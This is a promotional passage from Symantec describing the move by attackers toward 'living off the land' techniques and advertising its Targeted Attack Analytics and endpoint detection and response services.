As enterprise security teams shore up defenses against malware, ransomware, and other external threats, and use existing tools to patch vulnerabilities, attackers are shifting their attack strategy from zero-day exploits (which have become too costly and complex) to ‘living off the land’ techniques. In fact, the Symantec 2018 Internet Security Threat Report, Volume 23 (ISTR 23) notes that only 27 percent of the 140 Symantec-tracked attack groups used zero-day vulnerabilities. Existing security prevention tools cannot block sophisticated, previously unknown living off the land attacks that use tools already on the targeted system. By utilizing clean system tools and dropping in as few files as possible, attackers avoid being blocked or caught by traditional scanners and security measures. Also, memory-only attacks are even more difficult to detect as they leave very little evidence in their wake. The only defense is a more holistic approach, one that uses both global and local context informed by attack analytics, continuously enhanced and bolstered with new analytics. The solution should address both inside and external actors.
Symantec big data analytics and targeted attack research, and Endpoint Detect and Response (EDR) supplement existing security tools, enabling enterprises to expose previously unknown attacks. Only Symantec brings together rich telemetry, artificial intelligence, advanced machine learning, and research expertise to identify hard-to-detect attacks with high confidence (both at the machine and enterprise levels). Our massive, high-quality dataset, machine learning technologies, and collective research expertise gives Symantec customers unparalleled, tailored, and prioritized incident notification with clear recommendations for response and remediation. Delivered as a cloud service, TAA enables new and enhanced analytics to be continually delivered to our EDR customers (using Advanced Threat Protection: Endpoint) without the need for on-going updates.
